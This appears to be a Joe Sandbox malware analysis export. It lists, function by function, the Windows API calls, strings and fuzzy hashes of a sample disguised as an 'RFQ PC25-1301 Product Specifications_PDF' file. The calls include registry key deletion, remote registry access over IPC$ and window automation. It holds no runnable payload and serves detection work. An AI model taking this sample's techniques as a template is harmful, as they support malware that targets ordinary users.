                                                                                                                • Instruction Fuzzy Hash: DE919D711042069FDB04CF14C985BAAB7E8FF8A354F04856AFD869B0D6DB70ED45CBA1
                                                                                                                Function 00AD8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AD8D5A
                                                                                                                • GetFocus.USER32 ref: 00AD8D6A
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00AD8D75
                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00AD8E1D
                                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AD8ECF
                                                                                                                • GetMenuItemCount.USER32(?), ref: 00AD8EEC
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00AD8EFC
                                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AD8F2E
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AD8F70
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AD8FA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1026556194-4108050209
                                                                                                                • Opcode ID: 8c299073b8c5a77c6f4476ea9ec6ce5ee9fd1cf2886ad9165bd535aec6e1123a
                                                                                                                • Instruction ID: be610634a950a116a53309ea2f950c30986491b0392d96263bdcec90be3ea782
                                                                                                                • Opcode Fuzzy Hash: 8c299073b8c5a77c6f4476ea9ec6ce5ee9fd1cf2886ad9165bd535aec6e1123a
                                                                                                                • Instruction Fuzzy Hash: 89819E715083019FDB10CF24D984AAB7BE9FB88764F140A5AF99697391DF34D901CBA1
                                                                                                                Function 00AADC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AADC20
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AADC46
                                                                                                                • _wcslen.LIBCMT ref: 00AADC50
                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00AADCA0
                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AADCBC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 1939486746-1459072770
                                                                                                                • Opcode ID: f57a2319d4e32f4b19ea8639c583edf34d8b98d055806b4f2a09d8201859050b
                                                                                                                • Instruction ID: bfaebc165d9ce6ced8582d7c36b37ed92037846d72ad53396c1e2581cb694081
                                                                                                                • Opcode Fuzzy Hash: f57a2319d4e32f4b19ea8639c583edf34d8b98d055806b4f2a09d8201859050b
                                                                                                                • Instruction Fuzzy Hash: B4410132A402017AEB00AB749D07EFF77BCEF46760F50406AF902A71D2EB749A0186A4
                                                                                                                Function 00ACCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00ACCC64
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00ACCC8D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00ACCD48
                                                                                                                  • Part of subcall function 00ACCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00ACCCAA
                                                                                                                  • Part of subcall function 00ACCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00ACCCBD
                                                                                                                  • Part of subcall function 00ACCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00ACCCCF
                                                                                                                  • Part of subcall function 00ACCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00ACCD05
                                                                                                                  • Part of subcall function 00ACCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00ACCD28
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ACCCF3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 2734957052-4033151799
                                                                                                                • Opcode ID: 3856476179882842124bf9af5d0fa686c63b423629f3ff3a8e35199f7138a162
                                                                                                                • Instruction ID: 0fa2f8536f674fc088fef876feabfebbc6c3bf71b855051d02e7e3f48439633d
                                                                                                                • Opcode Fuzzy Hash: 3856476179882842124bf9af5d0fa686c63b423629f3ff3a8e35199f7138a162
                                                                                                                • Instruction Fuzzy Hash: 47318571901129BBDB21CB95DC88EFFBB7CEF15760F014169F90AE3150DB345A46DAA0
                                                                                                                Function 00AB3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AB3D40
                                                                                                                • _wcslen.LIBCMT ref: 00AB3D6D
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AB3D9D
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AB3DBE
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00AB3DCE
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AB3E55
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AB3E60
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AB3E6B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                • String ID: :$\$\??\%s
                                                                                                                • API String ID: 1149970189-3457252023
                                                                                                                • Opcode ID: 5ff9334f181663ee0e78223047a7ded28f9c3f6c70840abd122dcf7272d492bc
                                                                                                                • Instruction ID: 470198cf38a40784c44423826bb08b24b2b237b41ffbfbf1dde4c7f9185a06f4
                                                                                                                • Opcode Fuzzy Hash: 5ff9334f181663ee0e78223047a7ded28f9c3f6c70840abd122dcf7272d492bc
                                                                                                                • Instruction Fuzzy Hash: D231AF72A4021AABDB20DBA0DC49FEF77BCEF88710F5041A6F619D6061EB709745CB24
                                                                                                                Function 00AAE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • timeGetTime.WINMM ref: 00AAE6B4
                                                                                                                  • Part of subcall function 00A5E551: timeGetTime.WINMM(?,?,00AAE6D4), ref: 00A5E555
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00AAE6E1
                                                                                                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00AAE705
                                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AAE727
                                                                                                                • SetActiveWindow.USER32 ref: 00AAE746
                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AAE754
                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AAE773
                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00AAE77E
                                                                                                                • IsWindow.USER32 ref: 00AAE78A
                                                                                                                • EndDialog.USER32(00000000), ref: 00AAE79B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                • String ID: BUTTON
                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                • Opcode ID: d5100890c559b927b551ae3a8ecbd687e1f23f811de0a2361bdeed54e5915f74
                                                                                                                • Instruction ID: 56b7f60433836c6c9fbcbbd5d5325c4737470b9a7921b328fa8cfa8481dd81ee
                                                                                                                • Opcode Fuzzy Hash: d5100890c559b927b551ae3a8ecbd687e1f23f811de0a2361bdeed54e5915f74
                                                                                                                • Instruction Fuzzy Hash: 54218170200206FFEB00DFA4ED89B653B69F796759B905826F512831E1DF71AC21CA24
                                                                                                                Function 00AAE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AAEA5D
                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AAEA73
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AAEA84
                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AAEA96
                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AAEAA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$_wcslen
                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                • API String ID: 2420728520-1007645807
                                                                                                                • Opcode ID: 182717ce388e025ca350189af7f767b8ceb01e7c64525cc17090eba0c753c06c
                                                                                                                • Instruction ID: df9f3dab60ac3cde8738cc812ea960357904e072820e8ab681d95d4440b4a645
                                                                                                                • Opcode Fuzzy Hash: 182717ce388e025ca350189af7f767b8ceb01e7c64525cc17090eba0c753c06c
                                                                                                                • Instruction Fuzzy Hash: 64115E35A902597DE720E7A5DD4AEFF6FBCEBD6B40F400469B801A30E1EBB05925C5B0
                                                                                                                Function 00AA5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00AA5CE2
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AA5CFB
                                                                                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00AA5D59
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00AA5D69
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AA5D7B
                                                                                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00AA5DCF
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00AA5DDD
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AA5DEF
                                                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00AA5E31
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00AA5E44
                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AA5E5A
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00AA5E67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3096461208-0
                                                                                                                • Opcode ID: ae5818791e5f7880dcd5bb94dd1ab60b8d37bf6ff588f083a028a094db88bc06
                                                                                                                • Instruction ID: d0bdd49666ee64d6ba41e905e50f15c0c616aa51085a3766d1854ab62c5e6726
                                                                                                                • Opcode Fuzzy Hash: ae5818791e5f7880dcd5bb94dd1ab60b8d37bf6ff588f083a028a094db88bc06
                                                                                                                • Instruction Fuzzy Hash: CA510CB1E00606AFDF18CFA8DD89AAEBBB5FB49310F548129F516E7290D7709E01CB50
                                                                                                                Function 00A58BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A58F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A58BE8,?,00000000,?,?,?,?,00A58BBA,00000000,?), ref: 00A58FC5
                                                                                                                • DestroyWindow.USER32(?), ref: 00A58C81
                                                                                                                • KillTimer.USER32(00000000,?,?,?,?,00A58BBA,00000000,?), ref: 00A58D1B
                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00A96973
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A58BBA,00000000,?), ref: 00A969A1
                                                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A58BBA,00000000,?), ref: 00A969B8
                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A58BBA,00000000), ref: 00A969D4
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00A969E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 641708696-0
                                                                                                                • Opcode ID: 38a200a800ce201fc73983582c9fe73299cd1511b1cd82354ef68eab7933d243
                                                                                                                • Instruction ID: 9a5b92c028ad8192cf066e305fe367e40f2a5c16ee984f4d73f83b9e6bdd49b3
                                                                                                                • Opcode Fuzzy Hash: 38a200a800ce201fc73983582c9fe73299cd1511b1cd82354ef68eab7933d243
                                                                                                                • Instruction Fuzzy Hash: 49618931202601DFCF21DF19DA48B6977F1FF40363F548919E943AB960CB39A98ACB90
                                                                                                                Function 00A59838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59944: GetWindowLongW.USER32(?,000000EB), ref: 00A59952
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00A59862
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 259745315-0
                                                                                                                • Opcode ID: 7ecba849fd8d1b3a1609d43f27748ff7b521ffbeec2911f11d4184915a05bb7c
                                                                                                                • Instruction ID: 7aa70e50499eb08b2da2fb47ca73cfc9c8d9fb6153e2c4042f5dff6e67e9df59
                                                                                                                • Opcode Fuzzy Hash: 7ecba849fd8d1b3a1609d43f27748ff7b521ffbeec2911f11d4184915a05bb7c
                                                                                                                • Instruction Fuzzy Hash: 1C417131105651DFDF209F789C84BBA3BA5BB06372F544616F9A28F1E2D7319846DB20
                                                                                                                Function 00AA96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00A8F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00AA9717
                                                                                                                • LoadStringW.USER32(00000000,?,00A8F7F8,00000001), ref: 00AA9720
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A8F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00AA9742
                                                                                                                • LoadStringW.USER32(00000000,?,00A8F7F8,00000001), ref: 00AA9745
                                                                                                                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00AA9866
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                • API String ID: 747408836-2268648507
                                                                                                                • Opcode ID: 692820c60352edbbb460564bf9adf0cdbeb752226fb83848adac285e739781fe
                                                                                                                • Instruction ID: aeb3ce954abf6404f76f23efd353fa4b88c8a8c824e1ee4ede4406e41c778400
                                                                                                                • Opcode Fuzzy Hash: 692820c60352edbbb460564bf9adf0cdbeb752226fb83848adac285e739781fe
                                                                                                                • Instruction Fuzzy Hash: 0E410B72800219AADF04EBE0DE86EEFB778AF55341F500065F60577092EB356F59CBA1
                                                                                                                Function 00AA06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AA07A2
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AA07BE
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AA07DA
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AA0804
                                                                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00AA082C
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AA0837
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AA083C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 323675364-22481851
                                                                                                                • Opcode ID: 055fd9ef4efc33c02b2b9d56ab5090f2a72ef991c1d2b23e8b3a14ed8ac14852
                                                                                                                • Instruction ID: 9264dbb9ed5ae1524276ab4cbcb21c068451a990103e35bac63a50b3f4da52f1
                                                                                                                • Opcode Fuzzy Hash: 055fd9ef4efc33c02b2b9d56ab5090f2a72ef991c1d2b23e8b3a14ed8ac14852
                                                                                                                • Instruction Fuzzy Hash: C6411876C10229ABDF21EFA4DD95DEEB778FF54350F444169E801A71A1EB30AE04CBA0
